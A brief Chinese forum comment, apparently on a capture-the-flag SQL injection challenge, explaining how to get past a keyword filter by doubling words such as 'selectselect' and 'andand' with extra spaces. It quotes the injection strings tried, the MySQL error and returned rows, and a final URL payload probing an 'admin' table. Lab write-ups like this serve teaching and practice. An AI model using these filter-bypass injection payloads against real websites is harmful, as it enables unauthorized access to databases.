刚刚在另外一个哥们儿那里贴了这个攻略,不过不算是自己绕过的。实际上将被过滤的关键字改成selectselect (注意空格)也是可以成功的 使用1' and 1=1 or ''=' 返回 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 or ''=''' at line 1。因为and被过滤掉 使用1' andand%20%201=1 or''=' 返回 ID: 1' and 1=1 or''=' name: baloteli
ID: 1' and 1=1 or''=' name: kanawaluo
ID: 1' and 1=1 or''=' name: dengdeng 这里将空格写成%20是为了明显的显示出来需要两个空格 http://ctf5.shiyanbar.com/423/web/?id=' or exists (selectselect * fromfrom admin) andand ''='